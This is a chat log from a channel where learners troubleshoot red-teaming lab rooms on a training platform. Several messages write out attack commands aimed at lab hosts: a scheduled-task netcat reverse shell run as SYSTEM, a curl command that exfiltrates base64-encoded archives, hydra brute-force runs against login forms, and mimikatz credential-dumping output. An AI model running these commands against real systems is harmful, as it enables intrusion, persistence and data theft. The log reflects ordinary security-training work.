#red-teaming-path
I've removed the - in -F=
If I remove the -F= I got "[ERROR] Wrong syntax, requires three arguments separated by a colon which may not be null: /login-post/index.php"
I meant this one -
hydra -l burgess -P burgess.lst <IP> http-post-form "/login-post/index.php:username=burgess&password=^PASS^:Incorrect" -f
Did you create a new list from clinic.lst?
I simply updated your initial command.
Not sure if this is the right place to pose this question, but I'm having an issue answering a question under the "Red Team Threat Intel" room. Question asked is:
What web shell is APT 41 known to use?
I can't figure out if they are referring to the script language or the type of web shell. I've tried JScript as an answer. I've tried reverse (as in reverse shell). These seem like the only two possibilities that fit the number of characters permitted.
I was only wondering whether you have to remake the clinic.lst coz I've done it and the new file is really big and the hydra process is very slow.
What room is this by the way?
Password Attacks
Has anyone encountered KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP on persistingad::Task4 when using Rubeus to request a TGT? Any ideas how to solve it?
hi, would like to ask about the room - Active Directory basic room, in the third section, where it showed us how to use the delegation to allow phillip to change other users' passwords. I did exactly the same as it showed, but somehow, I keep getting access denied when I log in to Phillip's account via RDP on the Windows software, and use PowerShell to change another user's password. I tried to reboot the whole machine. Has anyone else had this problem? thanks
@ivory verge You using the password displayed ? (Claire2008) And spell phillip correctly also.
yes i did,
i think i figured it out, the problem is i started by logging in with phillip's account in the first place and tried to change his privilege to reset other user accounts, instead of logging in as the admin first. i believe this was the problem? so i think it's a mistake i made because i was doing this task on a different day and forgot about logging in as admin first
hi why do these two rooms keep loading?
https://tryhackme.com/room/avevasionshellcode
https://tryhackme.com/room/runtimedetectionevasion
is anyone familiar on how to set up the covenant c2 over the internet
I'm on the Abusing Scheduled Tasks task. I have achieved all the flags in a single session, but in flag 9 I cannot achieve it. I have tried several times with no results.
C:\flags>flag9.exe
flag9.exe
Sorry! You are still missing something. No flag for you yet. (eleven)
any suggestions?
For which room is this?
Windows Local Persistence
I have already obtained all the other flags
note says! Note: Be sure to use THM-TaskBackdoor as the name of your task, or you won't get the flag.
schtasks /create /sc minute /mo 1 /tn THM-TaskBackdoor /tr "c:\tools\nc64 -e cmd.exe 10.14.55.42 4449" /ru SYSTEM
hey all when it comes to os fingerprinting how reliable is it?
What are you referring to as being reliable for OS fingerprinting?
well i am trying to create some tool so, i needed to know the os type. i was trying using nmap but its results aren't effective, like most of the time it's wrong
If I remember correctly, nmap tries to guess the OS based upon the responses that it receives from the target such as TTL among other things.
Yeah, it makes the decision based on responses.
Hello All - I'm doing the Credential Harvesting module and I'm on Task5. I've dumped lsass.exe to a dump file. What tool would be used to analyze this file and harvest the credentials out of it? https://tryhackme.com/room/credharvesting
Hi I'm in the phishing room doing the GoPhish simulation - Task 5 - I've followed the instructions step by step, however I still haven't received a password from the user Brian, nor has the e-mail been opened by anyone. Can anyone help me with this?
Never mind all good, I messed up the e-mail template, got it working now. 🙂
how is it possible for me to open 2 vms via the website, to do the weaponisation stuff with html
How did you find the Email Samples?
You don't need two VMs, you can run the attackbox or your own Kali, and stage everything from one place. Host the payload, run a listener etc. in two terminal sessions.
Hi, can anyone confirm that the rooms 'Breaching Active Directory' and 'Enumerating Active Directory' are free or not?
Those are free, but it does require a streak of at least 7 days for non-subscribers.
Oh I see thanks.
Hi guys, I have a problem with the Room "Password Attacks" task 8. It asks me to perform a brute-forcing attack against the user phillips using hydra. I entered the command but it found 0 valid passwords.
My command:
hydra -l phillips -P clinic.lst 10.10.76.50 http-get-form '/login-get/index.php:username=^USER^&password=^PASS^:F=Login failed!'
When I try it with burp suite I get a few passwords with the code 200 and one of those passwords is the right one, but with hydra, no luck
change the failure statement or change it to a success statement
Hi, I'll be finishing the Jr. pentester path soon and I'm not sure if I should go with the offensive pentesting or red teaming path afterward 🤔 . Sometime ago I started the offensive pentesting path (31%) but now I'm not sure if I should finish it first or come to this path. Any suggestions?
There is a suggested order for completing the paths -
awesome!! thanks a lot 😄
Gave +1 Rep to @spare depot (current: #25 - 309)
but why? I don't know the password and I don't know the success statement
Make an educated guess... Also known as logout.php
Yep it worked, thank you
Gave +1 Rep to @royal void (current: #4 - 1604)
I completed the Red Teaming path yesterday! I did it after Jr Pentester so it was a steep curve.
Now I'm going to take it a little easier and try my hand at some offensive pentesting rooms
@nocturne sorrel apologies for the late reply. The Email template has to be manually created per the task instructions, then selected for the campaign per the drop-down box via the template name. Hope that helps.
Hi all, I'm having issues with task 7 in the Windows Internal Room. I executed the executable and got a pop-up message with the flag, but when I entered the flag for the answer it wasn't accepted as correct.
I don't know if I should post the screenshot of the flag in this room, maybe I can DM it to whoever can help me?
Just to note that copy and paste wasn't possible with the pop-up message box.
Hi all, would appreciate some help with my issue. 🙂 Not sure if there's any more information I can put here without revealing the flag. Also please let me know if this is the wrong room for this question. I have also posted it to #room-help with no response.
Issue resolved. 🙂
oh sorry for no reply... often times shadow pipes in
No problem. 🙂
still good you could figure it out on your own
Had help from #room-help haha 🙂
I do have another question regarding the same room "Windows Internals" but for Task 5.
For the question - How many DLLs were loaded by "notepad.exe"?
I filtered all the "Load Image" operations for the notepad.exe process
There should be 52 DLLs loaded? But that's not the expected answer.
Does that mean some of the 52 are not counted as "DLLs"?
@royal void would appreciate your help if you have some ideas. 🙂
could be duplicates too.... but not sure
to be honest shadow don't recall doing this room
No worries appreciate you replying. 🙂
One of those is not a .DLL (not talking about notepad.exe)
Ahh I see it now - winspool.drv - thanks @oblique marsh
Gave +1 Rep to @oblique marsh (current: #367 - 12)
https://tryhackme.com/room/signatureevasion Task 5 | tags SCP
Am I doing this incorrectly? I assume since the port is closed and I can't open it.
Solution: ||From win machine; scp Desktop\Binaries\shell.exe root@10.10.xx.xx:/root/Desktop/||
||https://www.youtube.com/watch?v=2mB4CkyMhkk||
Static Property-Based Signatures
Shannon entropy using CyberChef
https://tryhackme.com/room/signatureevasion
Sandbox Evasion:
https://youtu.be/4Ev23IYt1k0
Credentials Harvesting:
https://www.youtube.com/playlist?list=PLrY_AbzZGqt9L88TY0NujFdnhU244yQvQ
AV Evasion: Shellcode:
https://www.youtube.com/playlist?list=PLrY_AbzZGqt_-sHuHORntt-ybcrTB...
Hello, room Password Attacks task 8: I used default credentials to access the remote machine via FTP. Using the "dir" command just tells me there are 2021 files in the current remote directory.... I guessed the name of the flag and used the "get" command but I get "550 Failed to open file" so the file does not exist... Is it that hard to get the flag or its just me missing something?
What’s a good recommendation for CEHv12 practice exam questions?
This may be better posted in the #infosec-general channel.
What to use when I have no eth0 interface? I tried ens5 interface but it didn't seem to work.
What room or network are you working on?
Room: https://tryhackme.com/room/dataxexfilt
Task: ICMP Exfil
Can you try ip a? ens5 seems to be it but according to you it didn't work.
Can you also run show options in msfconsole?
It says the interface isn't required, did you try running the module without it?
Unfortunately didn't help
I'm reading about OPSEC vulnerabilities right now, and I'm confused by one about a vulnerable database
Ohhh nvm
Red team collects phishing data -> RT stores phishing data in their own vulnerable database -> RT exposes client's data
I see
Did you figure it out yet?
Nope but I went on with the tasks.
Hi! How can I enable the preset from postgresql?
I need help with the password attacks room for task 8 question 2. I added [List.Rules:THM-Password-Attacks]
Az"[0-9][0-9]" ^[!@]
to the bottom and launched hydra with:
hydra -l pittman@clinic.thmredteam.com -P dict.lst smtp://10.10.74.162:465 -v -I
it was not working so I checked the answer and it is in the wordlist
I am connected to vpn
I watched tutorials and it wasn't working for them either
pls help
Are you connected to THM OpenVPN? Is the target a Windows box?
I am connected and target is win
It probably won't respond to pings then, can you RDP in as I think the room wants you to? (If you are in Weaponization room like I think you are)
ok
It worked
Cool then you should be good to go
thx
Gave +1 Rep to @fresh coral (current: #45 - 161)
I'm having an issue with Exploiting Active Directory - Exploiting Kerberos Delegation... I can't dump LSA with mimikatz. I've tried with a couple of t2 admin accounts.
```
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
mimikatz # lsadump::secrets
Domain : THMWRK1
SysKey : a1403e57976b472bce5f231922ca3942
ERROR kuhl_m_lsadump_secretsOrCache ; kull_m_registry_RegOpenKeyEx (SECURITY) (0x00000005)
```
I would really appreciate some help or insight
also, it's not a huge deal, but task 2 mentions logging into thmjmp1 instead of thmwrk1 under the Add Member section: "Start PowerShell (either in RDP or via SSH) on the THMJMP1 host and run the following command to add your account:"
I figured out my mistake. I wasn't using the t2_<username>'s
I'm curious in the Active Directory Credential Harvesting room in Task 4 we dumped the SAM and SYSTEM files and used impacket's secretsdump.py to decrypt them. This gives us the local hashes but not the ones for the AD accounts. The room states To Decrypt them, we need to dump the SECURITY file from the Windows file, which contains the required files to decrypt Active Directory accounts.
I grabbed the ...\config\SECURITY file and tried to run that through secretsdump.py but got the error [-] 'NoneType' object is not subscriptable. How do we use the SECURITY file?
What was your command to export the SECURITY file? What was your command when you ran secretsdump.py?
worked it out. I set the path on secretsdump.py to the correct security file path, but forgot to change the -sam flag to the -security flag
👋
Working through https://tryhackme.com/room/bufferoverflowprep and I've got a nice script working to walk through the various payloads.
One thing I can't explain is the variability - some commands I'll get a shell first try, 1-2 on the second, and of OVERFLOW4 I can't seem to get the shell at all.
I was able to debug a weird output comparing bytearrays wrong EIP (I had inverted 2 digits in the EIP offset, so my payload was shifted ~50 bytes) using the Follow in Dump command (and understanding of the payload sent);
Can anyone help point me to a resource/tip that might help me understand why my payload/formula/script isn't working for this specific command?
I'm having some issues with why John is ignoring the --rules=THMRule option when using --wordlist and instead just processes the wordlist through Jumbo or even All no matter which rule section I specify
If anyone has suggestions or time to assist me, I would greatly appreciate it
hi guys, I wanted to ask about kerberos plz, I noticed on many blogs that the KRB_AS_REQ uses password hash to encrypt the message
so it means if I have the hash without the password I can either:
1- impersonate him and get access to things that he has access to
2- be able to decrypt the messages he sends if I could somehow man-in-the-middle
right?
how do y'all do that idk anything
@untold cypress Yes, user's password hash is used to encrypt timestamp in Kerberos pre-authentication.
Having the user's hash you can impersonate the user in several ways.
I cannot think of useful ways one could decrypt the user's traffic (like related to NTLM or Kerberos you mentioned).
Without going too deep in Kerberos here, AS-REQ is only the beginning of Kerberos authentication and messaging. After that the messages, like related to requesting service tickets and service access, are signed / encrypted with other keys too.
@kind egret what I meant for the impersonation point:
if I can send the first message as user "Alice" at first using her hash then I can impersonate her because I am the one that the keys will be shared with, but for decryption I don't know if the hash is enough since there is other requests and keys
thank you for confirming
Gave +1 Rep to @kind egret (current: #561 - 7)
So I'm at c2 room
What is the difference between dns vs smb vs http/ https tuning
???
And why to choose one over the other
I'm having an issue in the room "Breaching Active Directory" Task 4: https://tryhackme.com/r/room/breachingad. I have confirmed I am connected to the active directory vpn and the network state for the simulated ad is running. I've gone through all the steps in the room and I'm still getting the "supportedCapabilities" message when pinging from the printer website:
└─# sudo dpkg-reconfigure -p low slapd
Backing up /etc/ldap/slapd.d in /var/backups/slapd-2.5.13+dfsg-5+b3... done.
Moving old database directory to /var/backups:
- directory unknown... done.
Creating initial configuration... done.
Creating LDAP directory... done.
┌──(root㉿kali)-[/home/kali/Desktop]
└─# sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart
SASL/EXTERNAL authentication started
SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
SASL SSF: 0
modifying entry "cn=config"
┌──(root㉿kali)-[/home/kali/Desktop]
└─# ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms
dn:
supportedSASLMechanisms: LOGIN
supportedSASLMechanisms: PLAIN
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lvp 389
listening on [any] 389 ...
10.200.97.201: inverse host lookup failed: Host name lookup failure
connect to [10.50.94.24] from (UNKNOWN) [10.200.97.201] 49761
0�Dc�;
x�
objectclass0�supportedCapabilities0�P0�Fc�=
Doing intro to C2, on the Command Control and Conquer and armitage is not on the attack box and it doesnt tell me how to install it
running armitage doesnt show anything installable
Armitage is no longer supported
That's possibly why
Did anyone have issues on "AV Evasion: Shellcode" on the first shellcode section? I get this whenever I try and compile on the attackbox
I got same problem today
I tried to install it from GitHub repo
But i am not able to open the interface
Even Installed Java - 11 too
hi, I am on task 7 of the Signature Evasion room,~~ I dont see where to upload the final exe to get the reverse shell. Any advices? Thank you~~ my bad, didn't start task 7 instance, thought it used the same as task 1
Suggest to post this in the #room-bugs channel.
Hi I'm stuck on task 2 of the Signature Evasion room, I've split the binary to below the kilobyte range, but my answer is not accepted as correct. I don't know if a decimal or hexadecimal format is accepted, or if I'm going about this the wrong way?
Also I tried to use ThreatCheck in task 3 to verify my answer to task 2, but I got this exception when running ThreatCheck:
Can i have 3 more votes to reset the network in the Exploiting Active Directory room?
This would help if you state your subnet.
My bad, it's 10.200.143.0/24
Hi I'm trying to get the flag for task 10 in the "Evading Logging and Monitoring" room. I've followed the walkthrough to disable script block, script block invocation and module logging as well as to clear logs from "Windows Powershell" and "Application/Microsoft/Windows/PowerShell/Operational" locations, however when running the agent I still get the "Traffic halted, you got caught" message. Is there anything else I didn't do?
Is it an issue with running the agent too early or too late?
Can anyone let me know what the "Traffic halted, you got caught" message is meant to indicate?
Might be a custom message for the target?
Not too sure what that message is meant to convey though. With "Binary leaked" it's because agent.exe showed up in the logs but I'm not too sure what the correlation between "traffic halted" and detection is. I'm probably missing something pretty obvious. 🙂
I haven't done the room yet, but from what I can understand, your binary touched a process it shouldn't, thus being detected.
My input is meant to be a PowerShell script rather than a binary. But maybe I deleted some logs that I shouldn't have?
Hi as previously reported for task 3 of the Signature Evasion room I keep on getting the following exception: "IOException: The process cannot access the file 'C:\temp\file.exe' because it is being used by another process" whenever I run ThreatCheck.exe on shell.exe. This is stopping me from finishing Task 3. Anyone has any ideas how to solve this, or is it a bug in the room?
New screenshot here:
I was able to compile and run ThreatCheck successfully on my own Windows 10 VM, but the answer it gave was not accepted as the right answer for the task. Could this be a room bug?
Managed to get the right answer through manual splitting of the binary instead of running ThreatCheck. ThreatCheck not working as expected is still a bug though.
Hey all, I'm working on the "Online Password Attacks" Q#3 that requires a login-get URI. I feel that I'm trying the correct hydra command but I get nothing back. My command is "hydra -l phillips -P clinic.lst 10.10.x.x http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f", I've also tried S=302 and get nothing either. Can anyone tell me where I'm going wrong?
10.10.x.x did you redact the IP address for discord or is that the command you ran?
I redacted it for Discord
Sorry that I ask, but you never know...
Redacting Ip's is bad IMO, I can't help fully without knowing the IP.
Sometimes people launch the attackbox and use that IP and wonder why stuff doesn't work.
This works for me hydra -l phillips -P clinic.lst 10.10.x.x http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f
I don't see how it's different from yours, but it works.
What I don't understand is why this doesn't work: hydra -l phillips -P clinic.lst 10.10.x.x http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:F=failed"
If I send a request manually the response contains "failed", so the F= should match that and hydra display everything that does not fail. Instead I get no result.
Yeah, I don't know. I've tried with the Kali attack machine and my personal Kali using the VPN. I get the same results, nothing.
I can DM you the password I get from the first one, which looks identical to yours, if you want. Still would like to know why my other version doesn't work.
I appreciate it. I was more interested in seeing if I was doing anything wrong. It seems like it may be an issue somewhere else.
I got a question, how do I bring a file into one of the windows machines when there's no internet on the machine?
For context, I'm on Task 6 for the living off the land room.
I tried using Certutil and others, but I haven't been able to get the file onto the machine. Anyhow, thank you!
I don't know that room, but to get a file from the attackbox to a target you can start an http server on the attackbox with python3 -m http.server 4242 in the folder in which the file is located. Then on the target wget ATTACKBOX_IP:4242/FILENAME to download it.
Okay, thank you I'm gonna try that right now
Not too relevant on THM, but for good measure: If you start an http server this way it makes every file in the same folder accessible. Also files you might not want to share with others. To be safe: create a folder, put the file you want to move into the folder, cd into the folder and start the http server there.
for example
mkdir server-dir
mv myfile server-dir
cd server-dir
python3 -m http.server 4242
I prefer updog to transfer files.
i have a problem with the Lateral Movement and Pivoting lab. I can't get a shell from psexec and I saw a clock with 45, does that mean this machine will disappear after 45 min?
You can add an hour at any time
Hi team,
I just wonder to where Breaching AD room should redirect me. Now it's redirecting to My Rooms and I'm unsure how to continue study. Should I pick up some room from the list? I don't know which one.
The reason it is directing you to my rooms is you probably do not have the required streak.
For non-subscribers, there is usually a 7-day streak requirement before you are allowed access to those rooms.
Thank you. I'm on my way to subscribe again 🙂
Can anyone suggest tool name's which is used to build malicious apks like 888 rat, spynote etc
Why do you want to learn this?
Your question answers itself! My desire to become a hacker stems from a deep passion for cybersecurity and technology. Without knowledge of tools and technology, I can't achieve my goal of becoming a skilled hacker. It’s essential to start with the basics to build a solid foundation. This learning journey is crucial for anyone serious about mastering the art and science of hacking
It makes you seem like you'd like to be a black hat hacker....
I want to learn hacking because understanding the tools and techniques used in cybersecurity is essential, regardless of how we label hackers. The distinction between black hat and white hat hackers is based on their actions and intentions, much like how we differentiate good and bad people. Learning these skills is crucial for anyone in cybersecurity. Even ethical (white hat) hackers need to know about these methods to effectively protect systems. It's about using this knowledge responsibly to secure and defend against potential threats.
Yes, but you do realise we have a fair number of members who wish to learn these tools for the opposite reason.
Could anyone recommend some good reverse engineering resources like free books, online courses, or tutorials? Thanks in advance!
lowlevellearning, one of the most low level and assembly type of youtubers, has a lot of videos on how to start learning, things to keep in mind, ctf challenges, rust, c, etc.
other than that, I think crackmes.one offers a lot of ctf for reverse engineering
is there a way to copy and paste from the attack box to the 'start machine'?
To the target / victim, you mean? There's a couple. You could use http.server from the attackbox and fetch it using wget, another would be to send the file using nc in the Attackbox and a listener on the target, set up an ftp server on the Attackbox and connect to it from the target, etc.
im on task 5 of weaponization and im just following along the instructions and it says to copy from attack box to victim machine(windows) to create a macro, but I am unable to do that.
but i guess and can try what u suggested
I paste into the search bar on the browser, and then copy from there, click on attackbox or targetbox. a box will appear that says 'paste' now your stuff is in clipboard
I don't usually use split view
In Weaponization - task 2. the xfreerdp does not seem to be recognizing the credentials.
probably because some of the characters are interpreted by the shell... try placing the creds in ''
"xfreerdp /v:10.10.65.146 /u:"thm" /p:"TryHackM3" +clipboard
loading channel cliprdr
connected to 10.10.65.146:3389
SSL_read: Failure in SSL library (protocol error?)
SSL_read: error:14094419:SSL routines:ssl3_read_bytes:tlsv1 alert access denied
credssp_recv() error: -1
Authentication failure, check credentials.
If credentials are valid, the NTLMSSP implementation may be to blame.
Error: protocol security negotiation or connection failure"
oh huh wonder what went wrong there
Try /enforce-tlsv1_2
C++
Anyone get ad enumeration room open to your work?
I keep getting problem with Tun vs Tap setting, and I cannot seem to find any help online
I tried using the attackbox to complete the room, but the machine is not even connected to the adenumeration network
Hello everyone. I have a question about the port used by wmi. Wmi does not need to use 5985 or 5986, right? These two ports are used by winrm.
Remote Process Creation Using WMI
Ports:
135/TCP, 49152-65535/TCP (DCERPC)
5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)
Required Group Memberships: Administrators
Hi y'all, having an issue with the Breaching AD network, specifically configuring slapd rogue LDAP to only take PLAIN and LOGIN even with following directions from the room
Attaching my modified config file and the cmds + outputs from making the changes. Would really appreciate some assistance, I'm sure I'm just overlooking something simple
Hello all I have a question. In the Attack box how do I make myself a reg user and not root?
You could probably create a new user? Why though? There are commands or tools that need root-level access to run completely.
Its asking me to run a command as a non rooted user.
Hi, i am in the following room (https://tryhackme.com/r/room/weaponization) Task 9. I am a little bit confused about the upload input. I uploaded my payload and visited it, but it is not working? Is this upload input just for confusing reasons?
Did you set a listener on your own machine to wait on a call back?
Hello guys, password attacks room, task 4, question 2 (What is the crunch command to generate a list containing THM@% and output to a file named tryhackme.txt?) when I submit this answer => crunch 5 5 -t "THM@%" -o tryhackme.txt
it says answer is incorrect. I tried many many times with different answers but this is the correct one, tho its not working. any help?
That's incorrect. If you want to include special characters...what symbol do you use??
Yes right I got it
im a bit lost on task 4 of password attack, second question. according to the hint, i am to use "5 5" for the min-max character but the question requires 7 characters
You're looking for % # ?
in the empty answer box, there are asterisks that coordinates with the answer. "crunch 5 5 -t ******* -o tryhackme.txt". if I am to use THM@% which is 5 characters, this will not be proper since the asterisk require 7 characters. Im not sure what it is that i am misunderstanding with this problem.
does anyone have a working username_generator
You are able to.
You need to use thm
I figured it out thx
Gave +1 Rep to @vast quest (current: #1 - 2531)
what is the proper syntax for hydra using http-get-form. Im stuck on password attacks task 8. i used all the examples given but nothing is working, keep getting error messages
http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f
that wasnt it. I just figured it out. i kept getting an error:"There is no service http", which was really confusing me cuz according to the examples - thats whats being used.
wrong target machine??
its the right target machine. the issue was that instead of "http://10.10.x.x" im suppose to put "http-get://10.10.x.x."
oh nah
hydra -l phillips -P clinic.lst 10.10.48.200 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f
this is the exact command shadow used to get the correct answer
ive tried that. it didnt work
i just checked my history of commands, i actually didnt do it exactly like that, i did leave one thing on there which gave the error
so why is the question requesting a particular format when its not necessary?
password attacks;task 8, found the passwords for last two questions, but no flag. Now what?! isnt there suppose to be a login screen for me to test this?
Hello guys, is there anyone facing a problem with connecting to Enumerating AD room VPN network?
2024-08-03 14:21:18 [server] Peer Connection Initiated with [AF_INET]54.171.116.83:1194
2024-08-03 14:21:18 TLS: move_session: dest=TM_ACTIVE src=TM_INITIAL reinit_src=1
2024-08-03 14:21:18 TLS: tls_multi_process: initial untrusted session promoted to trusted
2024-08-03 14:21:19 SENT CONTROL [server]: 'PUSH_REQUEST' (status=1)
2024-08-03 14:21:19 PUSH: Received control message: 'PUSH_REPLY,route 10.200.33.0 255.255.255.0,route-metric 1000,route-gateway 10.50.9.1,topology subnet,ping 5,ping-restart 120,ifconfig 10.50.9.2 255.255.255.0,peer-id 0'
2024-08-03 14:21:19 OPTIONS IMPORT: --ifconfig/up options modified
2024-08-03 14:21:19 OPTIONS IMPORT: route options modified
2024-08-03 14:21:19 OPTIONS IMPORT: route-related options modified
2024-08-03 14:21:19 Using peer cipher 'AES-256-CBC'
2024-08-03 14:21:19 Error: problem with tun vs. tap setting
2024-08-03 14:21:19 Exiting due to fatal error
I tried to regenerate network vpn but its still not working.
Attackbox or vm?
my VM
BreachingAD and Lateral Movement and pivoting VPNs were working perfectly
Edit your config
and change the dev enumad to dev tun
Thank you bro, it worked!
Gave +1 Rep to @vast quest (current: #1 - 2562)
No worries sister!
oh sorry for assuming ur gender.. i guess ur a lady?
I'm not. 😄
But it's good practice to not use them if unsure 🙂
Yea my bad, didn't think about it.
anyways, have a good day!
and thank you again ^_^
Hi, I just finished the pre security path, for you can I directly engage the red teaming path?
It depends on your experience and background. In any case, you can jump straight into any path you choose, but do expect that it could be relatively difficult without the needed foundational knowledge.
I'm new in the cybersecurity field, I have only done the pre security path here on thm, so what do you suggest me to do?
There is a recommended path posted somewhere on this discord.
Thanks
Gave +1 Rep to @spare depot (current: #11 - 644)
I need a hint for windows privilege escalation task 7
Can you add a link to the room so it is easier for folks to help you out?
I already called it a night. Ill try again later. but basically I cant get the administrator permission
Is it the case study?
yes
using the instructions ive tried multiple ways to properly execute the Druva program but nothing seems to work. Ive read the whole task over and over again but still not understanding what it is im doing wrong.
everytime i run the command it just opens the file in notepad
In the room AV Evasion: Shellcode I am trying to create a new user to conclude the course and find a solution for task 2 but the last payload given (to test) does not work for the machine. I compiled the C# code, used Confuser and ran the new program but it's telling me there is an error in the syntax of the command 😅, I think it comes from the fact that we are running 2 commands but is there another way to add the user + add it to admin group?
When I tried to add my current user to admin group, it told me I can't do that so...
I found the video of someone to complete the room but if someone has a valid payload, I take it :).
They also made somewhat of a pathway on the Learn section finally, after I emailed them about it 3 years ago.
I see several posts here regarding the BreachingAD network, dating back to 6+ months ago. I'm using the AttackBox and launching it from the BreachingAD page (as specified). The interface that is supposed to be on that box "breachad" is not present.
Did anyone find the proper room to get the proper launch conditions for that interface in particular, another room that launches the same one, or find config changes/workarounds other than connecting to OpenVPN on another box? I tried launching the AttackBox from all paths/modules yesterday, nothing different. And now that I'm thinking about it, none of the other boxes within this same AD path are launching with their labeled interfaces either, such as: lateralmovement or whatever else
Double check your VPN files aren't blank.
On the built-in AttackBox?
Yes.
Sure. Where?
In the NetworkConfig directory on the Desktop.
All are blank
That's why there is no interfaces.
You'll need to leave the room with options and try a new subnet.
Does that mean leave the room and just re-join it?
Is this what you're saying?
Leave with the options menu. Then just re-join the room?
Yes.
Tried that yesterday and again just now. Still all blank.
Anyone have ideas on getting Attackbox to grab the right configs for these boxes?
I took the time to remove myself from ALL rooms (9 pages) I had previously joined. It fails to remove me from only 1, Active Directory Basics.
I wonder if this is causing some odd conditions since I can't actually leave it or join it properly. 🤷♂️ (Still doesn't get the correct VPN files)
Hey goofy question:
I'm in the Data Exfiltration room and trying to use tmux on the jump box
the split windows commands aren't working
I've tried ctrl-b + %
ctrl-b followed by percent
and nothing happens
Am I missing a step after opening tmux from the thm@jump-box session?
Thank you to any and all who see this btw!
lol figured it out...
this path is too confusing for me, is there anything I could do to gain enough knowledge about what I'm dealing with?
There is a recommended order to do the learning paths in the pins of #general that may be helpful to you or you could do some outside research on specific things you find confusing and find dedicated resource for those given topics.
Hard to give specific recommendations without knowing what you don't feel like you have enough knowledge on
the thing is I've completed
#pre-security-legacy-path #974406074444685322 #878393611929129000 #web-fundamentals-path #junior-pentester-path #offensive-pentesting-path
yet I still feel like I don't know much
Did you take notes during all of that? Did you do more research whenever you wanted to know more about something or were confused? There is a lot to learn for sure, it takes a while to get to know these things
I don't do notes, but I do some research when I get confused about how some of the things work
Well notes are very important in this field, you're not going to remember everything, but if you have solid notes to reference that goes a long way
Perhaps start taking some?
maybe I should but idk how and what to note
Everyone takes notes differently, best to just start trying and see what ends up working for you
I might go back to older rooms maybe redo them, take notes and do more research
especially windows rooms, I struggle with them the most
in "Red Teaming>Post Compromise>Windows Local Persistence>task4(abusing services)", I properly put in the command to create the service then used the command to start the service. The command to start the service fails. What am i missing? Ive tried in both cmd and PS. both services were created successfully.
I'm not able to join the Active Directory rooms like Breaching Active Directory.
Are you a sub or streak of > 7
No
Ah, those are required to join the room.
Hey i’m interested in the red path can someone provide me some guidance? what should i do in what order
The Learning Roadmap on THM is a good guide https://tryhackme.com/r/hacktivities. If you have IT experience you can start with #junior-pentester-path
@vast quest First time I'm checking since last month, network interfaces seem to be up on the attackbox now for the Active Directory rooms. Probably already confirmed working by now but just another heads/thumbs up.
A few weeks later I am having the same struggle. What did you do to get tmux working in the session?
Does the red teaming path just... not give any points at all? kind of sad for a "Hard" difficulty path to not be increasing my THM score 🙂 not a big deal, though. Just a shame to be spending tens of hours on something and not contributing to my team's achievements goals re: points per month
Hey guys, is the Red Teaming Path enough to pass CRTP ???
Haven't done so myself, but have you checked the areas / topics covered? I don't think it does as THM would probably mention it somewhere similar to what was done for CompTIA Pentest+, but better to compare it yourself.
CRTP has training with the voucher, right? Just go through that, heard that's enough to pass, and the AD rooms in THM could help a bit but are not necessary, the CRTP course is enough to pass it
Hi all, i need help. Data Exfiltration on task 8, after Edit Netplan Configuration File and try to Apply the Netplan Changes, i got an error message like this, how to fix it?
hi
Subscribe to THM premium and enroll in the Red Teaming Path
@rare ravine nah that is my first time to see the guy dethrone me in the king
youre toying me
never underestimate anyone!
ik youre laughing while youre typing that

what did you find?
hmm this must be a kind of superuserland been used
upon my forensic investigation i just found myself dumb
@rare ravine we are in the wrong channel
lmfao
i finished the breaching AD a while ago w/o a problem
now in enumerating AD seems to be the problem cant get the creds
i can ping the THMDC
is this the reason why i cannot get the creds? its down? lol
Yes.
nahh it's down since a while ago almost 7hrs 🥲
But it's still restarting.
yeah its restarting since a while ago
thm@victim1:~$ curl --data "file=$(tar zcf - task6 | base64)" http://web.thm.com/contact.php
curl: (7) Failed to connect to web.thm.com port 80: Connection refused
Data Exfiltration Room. Not sure why I am getting this error. Its on attackthebox, I literally followed a walkthrough step by step and for some reason this command just is not having it
task6
exfiltrate using http(s)
Hi
Just a heads up, the thm user (in admin shell) in Credential Harvesting within the Red Team Path can read the AdmPwd without needing to use the creds for bk-admin in Task 8. You already have those creds by that point, so not the end of the world. Just unsure if that was the intention or not.
signature evasion task 2 poorly explained
the GIF that was originally there needs to be put back
Can you share an image of what that is? You'll need to verify your account before doing so though.
@bronze sierra
https://www.youtube.com/watch?v=aJBu_v8_fvo&t=863s in this video starting of it compared to how it looks now
I have finished the room anyway now but in case u need feedback or change things
same same🥲
Is this room ezy?
Anyone had this problem too? I'm at Task 5 Offline Attacks - Dictionary and Brute-Force and I want to answer Q2.
I have this Input and Output:
hashcat -m 100 -a 0 8d6e34f987851aa599257d3831a1af040886842f /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1-66-g6a419d06) starting...
- Device #2: Outdated POCL OpenCL driver detected!
This OpenCL driver has been marked as likely to fail kernel compilation or to produce false negatives.
You can use --force to override this, but do not report related errors.
clCreateContext(): CL_DEVICE_NOT_AVAILABLE
Started: Sat Nov 23 10:17:07 2024
Stopped: Sat Nov 23 10:17:07 2024
The issue you are facing:
- OpenCL Driver Issue: The warning indicates that the driver might fail or produce unreliable results.
- CL_DEVICE_NOT_AVAILABLE: Indicates that no compatible device is available to run the hashcat task.
1. Update Hashcat:
You're using an older version (v6.1.1). Update hashcat to the latest version:
sudo apt update && sudo apt install hashcat -y
2. Update OpenCL Drivers:
Check your GPU's driver and ensure it supports OpenCL properly:
For NVIDIA GPUs: Install the proprietary driver and CUDA toolkit.
